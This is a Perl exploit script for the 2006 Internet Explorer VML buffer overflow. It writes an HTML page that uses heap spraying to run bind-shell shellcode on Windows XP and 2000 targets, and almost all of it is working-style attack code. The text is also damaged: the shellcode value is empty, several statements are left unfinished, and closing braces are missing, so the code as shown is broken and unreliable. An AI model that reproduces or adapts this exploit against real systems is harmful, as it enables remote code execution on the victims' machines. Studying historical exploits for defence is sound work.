Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow









# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
# Windows 2000 SP4)
# Author: Trirat Puttaraksa (Kira) <trir00t [at]>
# For educational purpose only
# Note: This exploit is modified from Shirkdog's PoC 
# (
# I exploit the stack-based buffer overflow in the different manner because of 
# the problem of shellcode. I use heap spraying technique to injection my 
# shellcode in the heap. Because I can control EIP so I tell it to jump into 
# the heap that contains shellcode ^-^
# This exploit tested on: Windows XP SP1 + IE6 SP1 
# 			  Windows XP SP0 + IE6
#			  Windows 2000 SP4 + IE6 SP1
#			  Windows 2000 SP4 + IE6
# I will describe more implementation details at my blog in this weekend :)
# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
# This exploit is not success. The situation that overwrite to the location 
# that eax point to is not occured, so I cannot use my techqniue 
# "The Fake Cookie" that I use to break buffer overflow protection in 
# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
# with some techniques, plz share information :)

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =

my $jscript =
"<script>\n" .
"shellcode = unescape(\"" . convert_shellcode($shellcode) ."\");\n" .
"bigblock = unescape(\"\%u9090\%u9090\");\n" .
"headersize = 20;\n" .
"slackspace = headersize+shellcode.length;\n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" .
"memory = new Array();\n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;\n" .

my $header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n" .
"<head>\n" .
"<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\n" .
"</object>\n" .
"<style>\n" .
"v\\:* { behavior: url(#VMLRender); }\n" .
"</style>\n" .
"</head>\n" .
$jscript .
"<body>\n" .
"<v:rect style='width:120pt;height:80pt' fillcolor=\"red\">\n" ;

my $footer =
"</v:rect>\n" .
"</body>\n" .

my $body1 = "<v:fill method=\"" ;
my $body2 = 
"\" angle=\"-45\"\n" .
"focus=\"100%\" focusposition=\".5,.5\" focussize=\"0,0\"\n" .
"type=\"gradientRadial\" />\n" .
"</v:rect>\n" .
"</body>\n" .

my $page = "\xff\xfe";	# magic number of M$ unicode file
my $c;

# header + body1 
foreach $c (split //, ($header . $body1)) {
	$page = $page . $c . "\x00";

# padding + ret
$page = $page . "\x41\x00" x (256) . # padding
	"\x01\x0d\x0d\x0d" .	# writable memory
	"\x44\x44\x44\x44" . 	# padding
	"\x0d\x0d\x0d\x0d";	# return address

# body2 + footer
foreach $c (split //, ($body2 . $footer)) {
	$page = $page . $c . "\x00";

open (IE_VML, ">", "exploit.html");

print IE_VML $page;

close IE_VML;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
	my $data = shift;
	my $mode = shift() || 'LE';
	my $code = '';
	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	# Pad to an even number of bytes
	if (length($data) % 2 != 0) {
		$data .= substr($data, -1, 1);
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));	
		if ($mode eq 'LE') {
			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
		} else {
			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
		$idx += 2;
	return $code;

# [2006-09-21]